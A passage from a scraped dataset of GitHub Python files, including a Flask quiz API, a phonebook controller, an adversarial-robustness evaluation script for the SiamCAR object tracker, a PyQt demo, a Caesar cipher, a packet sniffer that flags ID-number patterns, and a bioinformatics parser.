jsonify({\n\t\t\t\t\t\t'id': dic_quest['id'],\n\t\t\t\t\t\t'name': dic_quest['name'],\n\t\t\t\t\t\t'options': dic_quest['options'],\n\t\t\t\t\t\t'correct_option':dic_quest['correct_option'],\n\t\t\t\t\t\t'quiz':dic_quest['quiz'],\n\t\t\t\t\t\t'points': dic_quest['points']\n\t\t\t\t\t}), 200\n\t\t\treturn {}, 404\n\t\texcept:\n\t\t\treturn jsonify({\n 'status': 'failure',\n 'reason': 'Something went wrong'\n }), 400\n\t\n\tdef get_all_questions_for_quizid(self, quiz_id):\n\t\tquestions_list = []\n\t\tquestion_file = self.read_question_file()\n\t\tfor question in question_file:\n\t\t\tif question['quiz'] == quiz_id:\n\t\t\t\tquestions_list.append(question)\n\t\tif len(questions_list) == 0:\n\t\t\treturn {}, 404\n\t\tquiz = Quiz().get_quiz(quiz_id)\n\t\treturn jsonify({\n\t\t\t'name': quiz['name'],\n\t\t\t'description': quiz['description'],\n\t\t\t'questions': questions_list\n\t\t}), 200\n\n\tdef create_question(self, que_input):\n\t\tque_input['id'] = int(uuid.uuid4())\n\t\tfor key in [\"name\", \"options\", \"correct_option\", \"quiz\", \"points\"]:\n\t\t\tif key not in 
que_input:\n\t\t\t\treturn jsonify({\n\t\t\t\t\t'status': 'failure',\n 'reason': 'Input is not correct'\n\t\t\t\t}), 400\n\t\tif (Quiz().check_if_quiz_exists(que_input['quiz']) == False):\n\t\t\treturn jsonify({\n\t\t\t\t'status': 'failure',\n\t\t\t\t'reason': \"Quiz Key doesn't exist\"\n\t\t\t}), 400\n\t\t\t\n\t\tque_json_file = self.read_question_file()\n\t\tque_json_file.append(que_input)\n\t\tself.write_questions_json_file(que_json_file)\n\t\treturn jsonify({\n 'id': que_input['id'],\n\t\t\t'name': que_input['name'],\n\t\t\t'options': que_input['options'],\n\t\t\t'correct_option':que_input['correct_option'],\n\t\t\t'quiz':que_input['quiz'],\n\t\t\t'points': que_input['points']\n }), 201","repo_name":"revive-k/FlaskDemo","sub_path":"api/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5566254764","text":"import data_base as db\r\nfrom parameters import name_file_db\r\n\r\ndef init_db():\r\n return db.read_element(name_file_db)\r\n\r\n# получение записи строки в виде списка без печати\r\ndef get_element_list(position_in_list: int) -> list:\r\n list_phone = init_db()\r\n return list_phone[position_in_list].split(' ' + ';' + ' ')\r\n\r\n# список печатаем красиво\r\ndef view_list(list_phone: list) -> str:\r\n data = ''\r\n for i in range(len(list_phone)):\r\n if i < len(list_phone) - 1:\r\n data += str(list_phone[i]) + ' | '\r\n else:\r\n data += str(list_phone[i]) + ' | ' + '\\n'\r\n #[print(list_phone[i], ' | ', end=' ') if i < len(list_phone) - 1 else print(list_phone[i], ' | ', '\\n') for i in range(len(list_phone)) ]\r\n return data\r\n\r\n# # заглавия колонок\r\ndef column_header():\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n \r\n# смотрим всю базу\r\ndef view_all_list():\r\n list_phone = init_db()\r\n column_header() # через заглавия колонок\r\n [print(view_list(get_element_list(i))) for i in range(len(list_phone))] \r\n \r\n\r\n# добавляем и меняем записи\r\ndef add_record_in_list_universal() -> str:\r\n return str(input('Введите фамилию: ')) + ' ; ' + str(input('Введите имя: ')) + ' ; ' + str(input('Введите телефон: ')) + ' ; ' + str(input('Пометка: ')) + '\\n'\r\n\r\n# добавляем\r\ndef add_record_in_list():\r\n data = add_record_in_list_universal()\r\n db.write_element('a', data, name_file_db)\r\n print('Запись добавлена!') \r\n\r\n# ищем по ключевому\r\ndef enter_key_word() -> str:\r\n return str(input('Введите слово для поиска: '))\r\n\r\n# удаляем по ключевому\r\ndef delete_record_in_list() -> db.write_element:\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n for_delete = 'Да'\r\n for_delete = str(input('Хотите удалить запись? 
(Да/Нет):'))\r\n if for_delete == 'Да' or for_delete == \"\":\r\n print(\"Запись удалена!\") \r\n break\r\n if find_word == False:\r\n result += \" ; \".join(entry) + '\\n'\r\n db.write_element('w', result, name_file_db)\r\n\r\n# ищем запись в базе\r\ndef find_record_in_list():\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n # column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n #break\r\n\r\n# редактируем запись по ключевому\r\ndef editing_record_in_list() -> db.write_element:\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n # column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n for_delete = 'Да'\r\n for_delete = str(input('Хотите отредактировать? (Да/нет):'))\r\n if for_delete == 'Да' or for_delete == \"\":\r\n result += add_record_in_list_universal()\r\n print(\"Запись отредактирована!\") \r\n break\r\n if find_word == False:\r\n result += \" ; \".join(entry) + '\\n'\r\n db.write_element('w', result, name_file_db)","repo_name":"Garde2/python3673","sub_path":"phonabase/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"25679436026","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport subprocess\n\nimport cv2\nimport torch\nimport numpy as np\nimport math\nimport sys\nimport shutil\nsys.path.append('../')\n\nfrom pysotcar.core.config import cfg\nfrom pysotcar.tracker.siamcar_tracker import SiamCARTracker\nfrom pysotcar.utils.bbox import get_axis_aligned_bbox\nfrom pysotcar.utils.model_load import load_pretrain\nfrom pysotcar.models.model_builder import ModelBuilder\nfrom toolkit.utils.region import vot_overlap, vot_float2str\n\nfrom toolkit.datasets import DatasetFactory\n\nparser = argparse.ArgumentParser(description='siamcar tracking')\nparser.add_argument('--video', default='', type=str, help='eval one special video')\nparser.add_argument('--dataset', type=str, default='UAV123', help='datasets')\nparser.add_argument('--vis', action='store_true', default=False, help='whether visualzie result')\nparser.add_argument('--snapshot', type=str, default='snapshot/checkpoint_e20.pth',\n help='snapshot of models to eval')\nparser.add_argument('--config', type=str,\n default='../experiments/siamcar_r50/config.yaml', help='config file')\nparser.add_argument('--case', type=int, required=True)\nparser.add_argument('--model_iter', type=str, required=True)\nparser.add_argument('--eps', type=int, required=True)\nparser.add_argument('--attack_universal', default=False, action='store_true',\n help='whether visualzie result')\nargs = parser.parse_args()\n\ntorch.set_num_threads(1)\n\n\nckpt_root_dir = '../../SiamRPNpp'\n\n\ndef load_generator():\n\n # OURS\n if 1:\n\n attack_method = 'TTA'\n import sys\n sys.path.insert(0, ckpt_root_dir + '/pix2pix')\n from options.test_options0 import TestOptions\n from models import create_model\n import os\n\n opt = 
TestOptions().parse()\n\n # this is dummy tracker name\n opt.tracker_name = \"dimp\"\n opt.istargeted = False\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n opt.model = 'G_template_L2_500_regress'\n opt.netG = 'unet_128'\n expcase, model_epoch, opt.eps = args.case, args.model_iter, args.eps\n\n ckpt = os.path.join(ckpt_root_dir,\n 'checkpoints/{}_{}/{}'.format(opt.model, expcase, model_epoch))\n print(\"Loading generator trained with TTA approach\")\n\n GAN = create_model(opt)\n print(\"generator checkpoint path:\", ckpt)\n GAN.load_path = ckpt\n GAN.setup(opt)\n GAN.eval()\n return GAN, expcase, attack_method\n\n\nGAN, expcase, attack_method = load_generator()\n\n\ndef main():\n # load config\n cfg.merge_from_file(args.config)\n\n # hp_search\n params = getattr(cfg.HP_SEARCH, args.dataset)\n hp = {'lr': params[0], 'penalty_k': params[1], 'window_lr': params[2]}\n\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n dataset_root = os.path.join(cur_dir, '../../testing_dataset', args.dataset)\n\n model = ModelBuilder()\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = SiamCARTracker(model, cfg.TRACK)\n\n # create dataset\n dataset = DatasetFactory.create_dataset(name=args.dataset,\n dataset_root=dataset_root,\n load_img=False)\n\n model_name = args.snapshot.split('/')[-1]\n\n total_lost = 0\n\n mean_FPS = []\n\n if args.dataset in ['VOT2016', 'VOT2018', 'VOT2019']:\n # restart tracking\n for v_idx, video in enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n frame_counter = 0\n lost_number = 0\n toc = 0\n pred_bboxes = []\n for idx, (img, gt_bbox) in enumerate(video):\n if len(gt_bbox) == 4:\n gt_bbox = [gt_bbox[0], gt_bbox[1],\n gt_bbox[0], gt_bbox[1] + gt_bbox[3] - 1,\n gt_bbox[0] + gt_bbox[2] - 1, gt_bbox[1] + gt_bbox[3] - 1,\n gt_bbox[0] + gt_bbox[2] - 1, gt_bbox[1]]\n tic = cv2.getTickCount()\n if idx == frame_counter:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx - (w - 1) / 2, cy - (h - 1) / 2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n pred_bboxes.append(1)\n\n if idx == 0 and args.vis:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n w, h = img.shape[:2]\n video_out = cv2.VideoWriter(os.path.join(\n \"./viz/\", video.name + \".avi\"), fourcc, fps=20, frameSize=(h, w))\n\n elif idx > frame_counter:\n\n # outputs = tracker.track(img, hp)\n outputs = tracker.track_advT(img, hp, GAN, 1, frame_id=idx)\n\n pred_bbox = outputs['bbox']\n overlap = vot_overlap(pred_bbox, gt_bbox, (img.shape[1], img.shape[0]))\n if overlap > 0:\n # not lost\n pred_bboxes.append(pred_bbox)\n else:\n # lost object\n pred_bboxes.append(2)\n frame_counter = idx + 5 # skip 5 frames\n lost_number += 1\n else:\n pred_bboxes.append(0)\n toc += cv2.getTickCount() - tic\n\n if args.vis and idx > frame_counter:\n cv2.polylines(img, [np.array(gt_bbox, np.int).reshape((-1, 1, 2))],\n True, (0, 255, 0), 3)\n bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (bbox[0], bbox[1]),\n (bbox[0] + bbox[2], bbox[1] + bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n cv2.putText(img, str(lost_number), (40, 80), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n video_out.write(img)\n toc /= cv2.getTickFrequency()\n\n if args.vis:\n video_out.release()\n\n if args.attack_universal:\n video_path = os.path.join('results_Universal_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name, 
'baseline', video.name)\n else:\n video_path = os.path.join('results_TD_{}_{}'.format(attack_method, expcase),\n args.dataset, model_name, 'baseline', video.name)\n\n # save results\n # video_path = os.path.join('results_{}_{}'.format(attack_method, expcase), args.dataset, model_name,\n # 'baseline', video.name)\n if not os.path.isdir(video_path):\n os.makedirs(video_path)\n result_path = os.path.join(video_path, '{}_001.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n if isinstance(x, int):\n f.write(\"{:d}\\n\".format(x))\n else:\n f.write(','.join([vot_float2str(\"%.4f\", i) for i in x]) + '\\n')\n print('({:3d}) Video: {:12s} Time: {:4.1f}s Speed: {:3.1f}fps Lost: {:d}'.format(\n v_idx + 1, video.name, toc, idx / toc, lost_number))\n total_lost += lost_number\n print(\"{:s} total lost: {:d}\".format(model_name, total_lost))\n\n else:\n\n # OPE tracking\n for v_idx, video in enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n toc = 0\n pred_bboxes = []\n track_times = []\n for idx, (img, gt_bbox) in enumerate(video):\n tic = cv2.getTickCount()\n if idx == 0:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx - (w - 1) / 2, cy - (h - 1) / 2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n pred_bboxes.append(pred_bbox)\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n w, h = img.shape[:2]\n\n if args.vis:\n if not os.path.isdir(\"./viz/\"):\n os.makedirs(\"./viz/\")\n video_out = cv2.VideoWriter(os.path.join(\n \"./viz/\", video.name + \".avi\"), fourcc, fps=20, frameSize=(h, w))\n else:\n\n # outputs = tracker.track(img, hp)\n outputs = tracker.track_advT(img, hp, GAN, 1, frame_id=idx)\n\n pred_bbox = outputs['bbox']\n pred_bboxes.append(pred_bbox)\n toc += cv2.getTickCount() - tic\n track_times.append((cv2.getTickCount() - tic) / cv2.getTickFrequency())\n\n # if idx == 0:\n # cv2.destroyAllWindows()\n if args.vis and idx > 0:\n if not any(map(math.isnan, gt_bbox)):\n gt_bbox = list(map(int, gt_bbox))\n pred_bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (gt_bbox[0], gt_bbox[1]),\n (gt_bbox[0] + gt_bbox[2], gt_bbox[1] + gt_bbox[3]), (0, 255, 0), 3)\n cv2.rectangle(img, (pred_bbox[0], pred_bbox[1]),\n (pred_bbox[0] + pred_bbox[2], pred_bbox[1] + pred_bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n video_out.write(img)\n toc /= cv2.getTickFrequency()\n\n if args.vis:\n video_out.release()\n\n if args.attack_universal:\n\n results_dir = 'results_Universal_{}_{}'.format(\n attack_method, expcase)\n\n model_path = os.path.join('results_Universal_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name)\n else:\n\n results_dir = 'results_TD_{}_{}'.format(\n attack_method, expcase)\n\n model_path = os.path.join('results_TD_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name)\n\n if not os.path.isdir(model_path):\n os.makedirs(model_path)\n result_path = os.path.join(model_path, '{}.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n f.write(','.join([str(i) for i in x]) + '\\n')\n\n mean_FPS.append(idx / toc)\n\n print('({:3d}) Video: {:12s} Time: {:5.1f}s Speed: {:3.1f}fps, Mean Speed: {:3.1f}'.format(\n v_idx + 1, video.name, toc, idx / toc, np.mean(mean_FPS)))\n\n result = subprocess.call(\n [\"sh\", \"-c\", \" \".join(\n ['python', '-W ignore', 'eval.py', '--tracker_path', results_dir, '--dataset', args.dataset,\n 
'--tracker_prefix', 'model_general'])])\n\n os.chdir(model_path)\n save_file = '../%s' % dataset\n shutil.make_archive(save_file, 'zip')\n print('Records saved at', save_file + '.zip')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"krishnakanthnakka/TTAttack","sub_path":"SiamCAR/tools/test_attack_ours.py","file_name":"test_attack_ours.py","file_ext":"py","file_size_in_byte":11798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37030165327","text":"import PyQt5.QtWidgets as qtw\nimport PyQt5.QtGui as qtg\n\n\nclass MainWindow(qtw.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Hi There\")\n self.setLayout(qtw.QVBoxLayout())\n # label\n my_label = qtw.QLabel(\"pick sth mf\")\n my_label.setFont(qtg.QFont('Helvetica',24))\n self.layout().addWidget(my_label) \n\n # Create a button \n my_button = qtw.QPushButton(\"I dare u\",\n clicked = lambda: press_it())\n self.layout().addWidget(my_button)\n # ## Create an Combo box\n # my_combo = qtw.QComboBox(self,\n # editable=True,insertPolicy=qtw.QComboBox.InsertAtBottom)\n # # Add Items to the Combo Box\n # my_combo.addItem(\"IDGAF \",qtw.QWidget)\n # my_combo.addItem(\"IDGAF \",\"f off\")\n # my_combo.addItem(\"IDGAF\",5)\n # my_combo.addItem(\"IDGAF\")\n\n # self.layout().addWidget(my_combo)\n # this makes the magic appear \n\n\n # Create Spin Bpx\n my_spin = qtw.QSpinBox(self,value=10,maximum=100,minimum=0,singleStep=5,prefix=\"#\",suffix=' order')\n # Change font size of spin box\n my_spin.setFont(qtg.QFont('Helvetica',18))\n self.layout().addWidget(my_spin)\n\n\n\n self.show()\n\n def press_it():\n my_label.setText(f'You Picked {my_spin.value()}')\n\n\n # ADd name to label\n # my_label.setText(f'You Picked {my_combo.currentData()}')\n # my_label.setText(f'You Picked {my_combo.currentText()}')\n # my_label.setText(f'You Picked {my_combo.currentIndex()}')\n\napp =qtw.QApplication([])\nmw =MainWindow()\napp.exec_()\n\n\n\n\n\n\n\n# import PyQt5.QtWidgets as qtw\n# import PyQt5.QtGui as qtg\n\n# class MainWindow(qtw.QWidget):\n# def __init__(self):\n# super().__init__()\n# # Add a title\n# self.setWindowTitle(\"hello world\") \n\n# # Set Vertical layout\n# self.setLayout(qtw.QVBoxLayout()) \n# # Create A Label\n# my_label =qtw.QLabel(\"Hello There\")\n# my_label.setFont(qtg.QFont('Helvetica',18))\n# self.layout().addWidget(my_label)\n# # Create an entry\n # my_entry = qtw.QLineEdit()\n # my_entry.setObjectName(\"ma,e_field\")\n # my_entry.setText('')\n# self.layout().addWidget(my_entry)\n # # Create a button \n # my_button = qtw.QPushButton(\"I dare u\",\n # clicked = lambda: press_it())\n # self.layout().addWidget(my_button)\n# self.show()\n# def press_it():\n# # ADd name to label\n# my_label.setText(f'Hello {my_entry.text()}')\n# # Clear entry\n# my_entry.setText(\"\")\n\n# app = qtw.QApplication([])\n# mw =MainWindow()\n\n# app.exec_()","repo_name":"MominRaza/assets","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"71335156395","text":"import random\n\nfish_property = {\n \"shark1\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\":3,\"speedRange\":1.1,\"captureProbability\":0.05,\"coinLevel\":2,\"multiple\":10},\n \"fish1\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\":1,\"speedRange\":2,\"captureProbability\":0.7,\"coinLevel\":1,\"multiple\":1},\n \"fish2\":{\"imageLenth\" : 
8,\"swimmingLength\":4,\"baseSpeed\":1,\"speedRange\":2,\"captureProbability\":0.6,\"coinLevel\":1,\"multiple\":2},\n \"fish3\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 1.5, \"speedRange\": 2, \"captureProbability\": 0.5, \"coinLevel\": 1,\"multiple\":3},\n \"fish4\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 2, \"speedRange\": 1, \"captureProbability\": 0.4, \"coinLevel\": 1,\"multiple\":4},\n \"fish5\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 1.2, \"speedRange\": 2.1, \"captureProbability\": 0.35, \"coinLevel\": 1,\"multiple\":5},\n \"fish6\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 1.4, \"speedRange\": 1, \"captureProbability\": 0.3, \"coinLevel\": 2,\"multiple\":1},\n \"fish7\":{\"imageLenth\" : 10,\"swimmingLength\":6,\"baseSpeed\": 1, \"speedRange\": 4, \"captureProbability\": 0.25, \"coinLevel\": 2,\"multiple\":2},\n \"fish8\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 2.2, \"speedRange\": 1, \"captureProbability\": 0.2, \"coinLevel\": 2,\"multiple\":3},\n \"fish9\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 1.2, \"speedRange\": 3, \"captureProbability\": 0.15, \"coinLevel\": 2,\"multiple\":4},\n \"fish10\":{\"imageLenth\" : 10,\"swimmingLength\":6,\"baseSpeed\": 1, \"speedRange\": 2, \"captureProbability\": 0.1, \"coinLevel\": 2,\"multiple\":5}\n}\n\nkknd = 'sdsdsd'\n\nkknd2 = 'sdsdsdsd'\n\nclass A:\n pass\n\ndef dosometing():\n print(kknd)\n\nis_left = True if random.randint(0,2) == 0 else False\n\ncannons = [ i for i in range(1,8) ]\nprint(cannons)\n\nprint(random.random())","repo_name":"syuyuusyu/py_fish","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"891632228","text":"import pandas as pd\nimport argparse\nimport os\n\n\ndesctiptionStr = '''\nExtract and de-replicate PANTHER ID for PANTHER analysis (Overrepresentation)\n\nOutput:\n\ncol 1: sequence ID\ncol 2: PANTHER accession (PTHRnnnnn for family HMMs, PTHRnnnnn:SFnn for subfamilies)\n\n\n'''\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Extract and de-replicate GO terms for BiNGO reference')\n parser.add_argument('path', help=\"path to interproscan output. 
needs '-appl PANTHER'\")\n parser.add_argument('--species', help='species', default='Not_set')\n parser.add_argument(\n '--curator', help='curator, generator of the annotation', default='Not_set')\n args = parser.parse_args()\n interproscanOutTsv = args.path.strip()\n species = args.species\n curator = args.curator\n convertedFile = f'{os.path.splitext(interproscanOutTsv)[0]}_pantherRef.tsv'\n source = pd.read_csv(interproscanOutTsv, sep='\\t', header=None, usecols=range(9), index_col=None)\n # print(source.head(10))\n corrdict = {} # id:panacc\n for i,r in source.iterrows():\n proid = r[0]\n if proid not in corrdict:\n corrdict[proid] = [\"-\", \"-\"] # retrieve none mapped for further notice\n if r[3] != \"PANTHER\":\n continue\n panacc = r[4]\n alrange = f\"{r[6]}-{r[7]}\"\n if proid in corrdict and corrdict[proid][0] != \"-\":\n if ':' in panacc:\n if ':' in corrdict[proid][0] and panacc != corrdict[proid][0]:\n print('EXCEPTION:')\n print(f'{proid}: {corrdict[proid][0]}[{corrdict[proid][1]}], {panacc}[{alrange}]')\n exit()\n else:\n corrdict[proid] = [panacc, alrange]\n elif ':' not in corrdict[proid][0] and panacc != corrdict[proid][0]:\n print('EXCEPTION:')\n print(f'{proid}: {corrdict[proid][0]}[{corrdict[proid][1]}], {panacc}[{alrange}]')\n exit()\n else:\n corrdict[proid] = [panacc, alrange]\n with open(convertedFile, 'w') as writer:\n for proid in corrdict:\n if corrdict[proid][0] != '-': # PANTHER does not accept none mapped\n writer.write(\"\\t\".join([proid,corrdict[proid][0]]))\n writer.write('\\n')\n\n print(convertedFile)\n","repo_name":"snail123815/BIO_tools","sub_path":"For_other_tools/parse_interproscann_go_annotation_panther.py","file_name":"parse_interproscann_go_annotation_panther.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19996585205","text":"import random\n\ni = 0\nplayer_count = 0\ncomputer_count = 0\nwhile i <= 2:\n player = int(input(\"1==石头,2==剪刀,3==布\"))\n computer = random.randint(1, 3)\n i += 1\n if player == 1 and computer == 2 or player == 2 and computer == 3 or player == 3 and computer == 1:\n print(\"玩家获胜\")\n player_count += 1\n elif player == 1 and computer == 3 or player == 2 and computer == 1 or player == 3 and computer == 2:\n print(\"电脑获胜\")\n computer_count += 1\n else:\n print(\"双方平局\")\nif player_count > computer_count:\n print(\"玩家获胜\")\nelif player_count < computer_count:\n print(\"电脑获胜\")\nelse:\n print(\"双方平局\")\n","repo_name":"HDIKhongdou/python","sub_path":"project/循环/猜拳三局两胜.py","file_name":"猜拳三局两胜.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74466710359","text":"\"\"\"Write a program that can perform the Caesar Cipher for english messages that\ninclude both upper- and lowercase characters\"\"\"\n\nclass CaesarCipher:\n \"\"\"Class for doing encryption and decryption using a Caesar cipher.\"\"\"\n\n def __init__(self, shift):\n \"\"\"Construct Caesar cipher using given integer shift for rotation.\"\"\"\n encoder_upper = [None] * 26 # temp array for encryption\n decoder_upper = [None] * 26 # temp array for decryption\n encoder_lower = [None] * 26 # temp array for encryption\n decoder_lower = [None] * 26 # temp array for decryption\n \n for k in range(26):\n encoder_upper[k] = chr((k + shift) % 26 + ord('A'))\n decoder_upper[k] = chr((k - shift) % 26 + ord('A'))\n encoder_lower[k] = chr((k + shift) % 26 + ord('a'))\n 
decoder_lower[k] = chr((k - shift) % 26 + ord('a'))\n self._forward = []\n self._backward = []\n self._forward.append(''.join(encoder_upper)) # will store as string\n self._forward.append(''.join(encoder_lower)) # will store as string\n self._backward.append(''.join(decoder_upper)) # since fixed\n self._backward.append(''.join(decoder_lower)) # since fixed\n print(self._forward)\n print(self._backward)\n def encrypt(self, message):\n \"\"\"Return string representing encripted message.\"\"\"\n return self._transform(message, self._forward)\n\n def decrypt(self, secret):\n \"\"\"Return decrypted message given encrypted secret.\"\"\"\n return self._transform(secret, self._backward)\n\n def _transform(self, original, code):\n \"\"\"Utility to perform transformation based on given code string.\"\"\"\n msg = list(original)\n for k in range(len(msg)):\n if msg[k].isupper():\n j = ord(msg[k]) - ord('A') # index from 0 to 25\n msg[k] = code[0][j] # replace this character\n if msg[k].islower():\n j = ord(msg[k]) - ord('a') # index from 0 to 25\n msg[k] = code[1][j] # replace this character\n return ''.join(msg)\n\nif __name__ == '__main__':\n\n cipher = CaesarCipher(3)\n message = \"THE Eagle IS IN pLAY; MEET AT JOE'S.\"\n coded = cipher.encrypt(message)\n print('Secret: ', coded)\n answer = cipher.decrypt(coded)\n print('Message:', answer)\n","repo_name":"franciscomunoz/pyAlgoBook","sub_path":"chap5-Array-Based_Sequences/P-5.34.py","file_name":"P-5.34.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42912611812","text":"import re\nfrom datetime import datetime\nfrom scapy.all import sniff\nfrom scapy.config import conf\nconf.use_pcap = True\n\ndef validate_date(text):\n \n try:\n datetime.strptime(text, '%y%m%d')\n except ValueError:\n return False\n return True\n\n\ndef find_ids(payload):\n\n ids = re.findall(r\"(\\d{6})-\\d{7}\", payload)\n contains_id = False\n for id in ids:\n if (validate_date(id)):\n print(\"This packet contains sensetive data!!\")\n return\n print(\"This is a normal packet\")\n\n\ndef packet_callback(packet):\n \n print(packet.show())\n find_ids(str(packet.payload))\n\n\nprint(\"Start sniffing...\")\nsniff(filter=\"udp port 4789\", prn=packet_callback)\n\n\n","repo_name":"song4evr/trashbox","sub_path":"mirroring_capture.py","file_name":"mirroring_capture.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30930660480","text":"#!/usr/bin/python3\nimport subprocess\nimport os\nimport shutil\nimport sys\nimport csv\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nENABLE_CA_AND_DISTORTION = False\n\nIMAGE_WIDTH = 6000\nIMAGE_HEIGHT = 4000\nIMAGE_DIAGONAL = (IMAGE_WIDTH**2 + IMAGE_HEIGHT**2)**0.5\n\nCORRECT_DISTORTION = True\n\ndef check_if_distortion_corrections_needed(exifstring):\n split = exifstring.split(' ')[1:]\n com_errors = np.array([float(txt) for txt in split[9:17]])\n return sum(np.abs(com_errors)) > 0.1\n\ndef check_if_ca_corrections_needed(castring):\n split = castring.split(' ')[1:]\n com_errors = np.array([float(txt) for txt in split[9:27]])\n return sum(np.abs(com_errors)) > 0.000001\n\n\ndef distortioncalc(exifstring, castring):\n # GEOEXAMPLE = \"400.5555556 0.3535211268 0.5 0.6126760563 0.7070422535 0.7908450704 0.8661971831 0.9352112676 1 1.06056338 -1.172515869 -2.354660034 -3.458114624 -4.434677124 -5.274719238 -5.918792725 
-6.328369141 -6.426345825 -6.42634582\"\n # CAEXAMPLE = \"400.5555556 0.3535211268 0.5 0.6126760563 0.7070422535 0.7908450704 0.8661971831 0.9352112676 1 1.06056338 -3.051757812e-05 -9.155273438e-05 -0.0001525878906 -0.0002136230469 -0.0002746582031 -0.0003356933594 -0.0004577636719 -0.0006103515625 -0.0006103515625 0.0007019042969 0.0007934570312 0.0008850097656 0.0009460449219 0.001037597656 0.001129150391 0.001220703125 0.001434326172 0.001434326172 400.5555556\"\n\n # exifstring = GEOEXAMPLE\n # castring = CAEXAMPLE\n max_height = (3**2+2**2)**0.5 / 2.0\n usepoints = 8\n split = castring.split(' ')[1:]\n rb_heights = np.array([float(txt) for txt in split[:usepoints]]) * (3**2+2**2)**0.5 / 2.0\n red_errors = np.array([float(txt) for txt in split[9:9+usepoints]]) #* -1\n blue_errors = np.array([float(txt) for txt in split[18:18+usepoints]]) #* - 1\n\n if exifstring is None:\n com_heights = rb_heights\n com_errors = np.zeros(com_heights.shape)\n else:\n split = exifstring.split(' ')[1:]\n com_heights = np.array([float(txt) for txt in split[:usepoints]]) * max_height\n com_errors = np.array([float(txt) for txt in split[9:9+usepoints]])\n print(com_errors)\n bother = sum(np.abs(com_errors)) > 0.1\n\n green_multipliers = com_errors * 0.01 + 1.0\n red_multipliers = (red_errors * 1 + 1.0) * green_multipliers\n blue_multipliers = (blue_errors * 1 + 1.0) * green_multipliers\n\n for a, b in zip(com_heights, rb_heights):\n assert a == b\n\n # 